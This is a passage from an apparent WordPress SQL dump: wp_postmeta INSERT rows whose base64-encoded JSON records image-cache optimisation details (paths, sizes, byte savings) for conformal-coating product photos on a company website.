ZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9tcy00NzVjLWFjcnlsaWMtY29uZm9ybWFsLWNvYXRpbmctMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzEzMDgsImlkIjoxNDA4fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTQ3NWMtYWNyeWxpYy1jb25mb3JtYWwtY29hdGluZy0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTQ3NWMtYWNyeWxpYy1jb25mb3JtYWwtY29hdGluZy0yMDB4MjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21zLTQ3NWMtYWNyeWxpYy1jb25mb3JtYWwtY29hdGluZy0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3MTMxMCwiaWQiOjE0MDh9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNDc1Yy1hY3J5bGljLWNvbmZvcm1hbC1jb2F0aW5nLTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNDc1Yy1hY3J5bGljLWNvbmZvcm1hbC1jb2F0aW5nLTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvbXMtNDc1Yy1hY3J5bGljLWNvbmZvcm1hbC1jb2F0aW5nLTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTcxMzEzLCJpZCI6MTQwOH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy00NzVjLWFjcnlsaWMtY29uZm9ybWFsLWNvYXRpbmctNTEweDYwMC5qcGciLCJ3aWR0aCI6NTEwLCJoZWlnaHQiOjYwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy00NzVjLWFjcnlsaWMtY29uZm9ybWFsLWNvYXRpbmctNTEweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9tcy00NzVjLWFjcnlsaWMtY29uZm9ybWFsLWNvYXRpbmctNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzEzMTYsImlkIjoxNDA4fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNDc1Yy1hY3J5bGljLWNvbmZvcm1hbC1jb2F0aW5nLTExNHgxMzAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNDc1Yy1hY3J5bGljLWNvbmZvcm1hbC1jb2F0aW5nLTExNHgxMzAuanBnIiwid2lkdGgiOiIxMTQiLCJoZWlnaHQiOiIxMzAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvbXMtNDc1Yy1hY3J5bGljLWNvbmZvcm1hbC1jb2F0aW5nLTExNHgxMzAuanBnIiwicmVkdWN0aW9uIjoxODMsInRpbWUiOjE0ODM1NzEzMTgsImlkIjoxNDA4fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNDc1Yy1hY3J5bGljLWNvbmZvcm1hbC1jb2F0aW5nLTE2MHgxNjAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNDc1Yy1hY3J5bGljLWNvbmZvcm1hbC1jb2F0aW5nLTE2MHgxNjAuanBnIiwid2lkdGgiOiIxNjAiLCJoZWlnaHQiOiIxNjAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvbXMtNDc1Yy1hY3J5bGljLWNvbmZvcm1hbC1jb2F0aW5nLTE2MHgxNjAuanBnIiwicmVkdWN0aW9uIjoxMTcsInRpbWUiOjE0ODM1NzEzMjEsImlkIjoxNDA4fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNDc1Yy1hY3J5bGljLWNvbmZvcm1hbC1jb2F0aW5nLTE4MHgxODAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNDc1Yy1hY3J5bGljLWNvbmZvcm1hbC1jb2F0aW5nLTE4MHgxODAuanBnIiwid2lkdGgiOiIxODAiLCJoZWlnaHQiOiIxODAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvbXMtNDc1Yy1hY3J5bGljLWNvbmZvcm1hbC1jb2F0aW5nLTE4MHgxODAuanBnIiwicmVkdWN0aW9uIjoxNTUsInRpbWUiOjE0ODM1NzEzMjQsImlkIjoxNDA4fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNDc1Yy1hY3J5bGljLWNvbmZvcm1hbC1jb2F0aW5nLTI0N3gzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNDc1Yy1hY3J5bGljLWNvbmZvcm1hbC1jb2F0aW5nLTI0N3gzMDAuanBnIiwid2lkdGgiOiIyNDciLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvbXMtNDc1Yy1hY3J5bGljLWNvbmZvcm1hbC1jb2F0aW5nLTI0N3gzMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTcxMzI2LCJpZCI6MTQwOH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTQ3NWMtYWNyeWxpYy1jb25mb3JtYWwtY29hdGluZy0zMDB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTQ3NWMtYWNyeWxpYy1jb25mb3JtYWwtY29hdGluZy0zMDB4MzAwLmpwZyIsIndpZHRoIjoiMzAwIiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21zLTQ3NWMtYWNyeWxpYy1jb25mb3JtYWwtY29hdGluZy0zMDB4MzAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3MTMyOSwiaWQiOjE0MDh9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy00NzVjLWFjcnlsaWMtY29uZm9ybWFsLWNvYXRpbmctNDAweDQwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy00NzVjLWFjcnlsaWMtY29uZm9ybWFsLWNvYXRpbmctNDAweDQwMC5qcGciLCJ3aWR0aCI6IjQwMCIsImhlaWdodCI6IjQwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9tcy00NzVjLWFjcnlsaWMtY29uZm9ybWFsLWNvYXRpbmctNDAweDQwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzEzMzIsImlkIjoxNDA4fV0='); 
INSERT INTO `wp_postmeta` VALUES (29529, 1407, 'wpfc_optimisation_reduction', '2364068'); 
INSERT INTO `wp_postmeta` VALUES (29530, 1407, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNDcyUy11cmV0aGFuZS1jb25mb3JtYWwtY29hdGluZy5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTQ3MlMtdXJldGhhbmUtY29uZm9ybWFsLWNvYXRpbmcuanBnIiwid2lkdGgiOjUxODQsImhlaWdodCI6MzQ1NiwibWltZV90eXBlIjoiIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21zLTQ3MlMtdXJldGhhbmUtY29uZm9ybWFsLWNvYXRpbmcuanBnIiwicmVkdWN0aW9uIjoyMzY0MDAyLCJ0aW1lIjoxNDgzNTcxMzQzLCJpZCI6IjE0MDcifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTQ3MlMtdXJldGhhbmUtY29uZm9ybWFsLWNvYXRpbmctMzQweDM0MC5qcGciLCJ3aWR0aCI6MzQwLCJoZWlnaHQiOjM0MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy00NzJTLXVyZXRoYW5lLWNvbmZvcm1hbC1jb2F0aW5nLTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvbXMtNDcyUy11cmV0aGFuZS1jb25mb3JtYWwtY29hdGluZy0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3MTM0NiwiaWQiOjE0MDd9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNDcyUy11cmV0aGFuZS1jb25mb3JtYWwtY29hdGluZy04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTQ3MlMtdXJldGhhbmUtY29uZm9ybWFsLWNvYXRpbmctODAweDUzMy5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9tcy00NzJTLXVyZXRoYW5lLWNvbmZvcm1hbC1jb2F0aW5nLTgwMHg1MzMuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTcxMzQ5LCJpZCI6MTQwN30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy00NzJTLXVyZXRoYW5lLWNvbmZvcm1hbC1jb2F0aW5nLTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNDcyUy11cmV0aGFuZS1jb25mb3JtYWwtY29hdGluZy03Njh4NTEyLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21zLTQ3MlMtdXJldGhhbmUtY29uZm9ybWFsLWNvYXRpbmctNzY4eDUxMi5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzEzNTIsImlkIjoxNDA3fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTQ3MlMtdXJldGhhbmUtY29uZm9ybWFsLWNvYXRpbmctMTYwMHgxMDY3LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNDcyUy11cmV0aGFuZS1jb25mb3JtYWwtY29hdGluZy0xNjAweDEwNjcuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvbXMtNDcyUy11cmV0aGFuZS1jb25mb3JtYWwtY29hdGluZy0xNjAweDEwNjcuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTcxMzU1LCJpZCI6MTQwN30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy00NzJTLXVyZXRoYW5lLWNvbmZvcm1hbC1jb2F0aW5nLTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNDcyUy11cmV0aGFuZS1jb25mb3JtYWwtY29hdGluZy0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21zLTQ3MlMtdXJldGhhbmUtY29uZm9ybWFsLWNvYXRpbmctMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzEzNTgsImlkIjoxNDA3fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTQ3MlMtdXJldGhhbmUtY29uZm9ybWFsLWNvYXRpbmctMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy00NzJTLXVyZXRoYW5lLWNvbmZvcm1hbC1jb2F0aW5nLTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvbXMtNDcyUy11cmV0aGFuZS1jb25mb3JtYWwtY29hdGluZy0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3MTM2MCwiaWQiOjE0MDd9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNDcyUy11cmV0aGFuZS1jb25mb3JtYWwtY29hdGluZy0yMjV4MjI1LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MjI1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTQ3MlMtdXJldGhhbmUtY29uZm9ybWFsLWNvYXRpbmctMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9tcy00NzJTLXVyZXRoYW5lLWNvbmZvcm1hbC1jb2F0aW5nLTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTcxMzYzLCJpZCI6MTQwN30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy00NzJTLXVyZXRoYW5lLWNvbmZvcm1hbC1jb2F0aW5nLTUxMHg2MDAuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNDcyUy11cmV0aGFuZS1jb25mb3JtYWwtY29hdGluZy01MTB4NjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21zLTQ3MlMtdXJldGhhbmUtY29uZm9ybWFsLWNvYXRpbmctNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzEzNjYsImlkIjoxNDA3fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNDcyUy11cmV0aGFuZS1jb25mb3JtYWwtY29hdGluZy0xMTR4MTMwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTQ3MlMtdXJldGhhbmUtY29uZm9ybWFsLWNvYXRpbmctMTE0eDEzMC5qcGciLCJ3aWR0aCI6IjExNCIsImhlaWdodCI6IjEzMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9tcy00NzJTLXVyZXRoYW5lLWNvbmZvcm1hbC1jb2F0aW5nLTExNHgxMzAuanBnIiwicmVkdWN0aW9uIjo1MywidGltZSI6MTQ4MzU3MTM2OCwiaWQiOjE0MDd9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy00NzJTLXVyZXRoYW5lLWNvbmZvcm1hbC1jb2F0aW5nLTE2MHgxNjAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNDcyUy11cmV0aGFuZS1jb25mb3JtYWwtY29hdGluZy0xNjB4MTYwLmpwZyIsIndpZHRoIjoiMTYwIiwiaGVpZ2h0IjoiMTYwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21zLTQ3MlMtdXJldGhhbmUtY29uZm9ybWFsLWNvYXRpbmctMTYweDE2MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzEzNzEsImlkIjoxNDA3fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNDcyUy11cmV0aGFuZS1jb25mb3JtYWwtY29hdGluZy0xODB4MTgwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTQ3MlMtdXJldGhhbmUtY29uZm9ybWFsLWNvYXRpbmctMTgweDE4MC5qcGciLCJ3aWR0aCI6IjE4MCIsImhlaWdodCI6IjE4MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9tcy00NzJTLXVyZXRoYW5lLWNvbmZvcm1hbC1jb2F0aW5nLTE4MHgxODAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTcxMzc0LCJpZCI6MTQwN30seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTQ3MlMtdXJldGhhbmUtY29uZm9ybWFsLWNvYXRpbmctMjQ3eDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy00NzJTLXVyZXRoYW5lLWNvbmZvcm1hbC1jb2F0aW5nLTI0N3gzMDAuanBnIiwid2lkdGgiOiIyNDciLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvbXMtNDcyUy11cmV0aGFuZS1jb25mb3JtYWwtY29hdGluZy0yNDd4MzAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3MTM3NiwiaWQiOjE0MDd9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy00NzJTLXVyZXRoYW5lLWNvbmZvcm1hbC1jb2F0aW5nLTMwMHgzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNDcyUy11cmV0aGFuZS1jb25mb3JtYWwtY29hdGluZy0zMDB4MzAwLmpwZyIsIndpZHRoIjoiMzAwIiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21zLTQ3MlMtdXJldGhhbmUtY29uZm9ybWFsLWNvYXRpbmctMzAweDMwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzEzNzksImlkIjoxNDA3fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNDcyUy11cmV0aGFuZS1jb25mb3JtYWwtY29hdGluZy00MDB4NDAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTQ3MlMtdXJldGhhbmUtY29uZm9ybWFsLWNvYXRpbmctNDAweDQwMC5qcGciLCJ3aWR0aCI6IjQwMCIsImhlaWdodCI6IjQwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9tcy00NzJTLX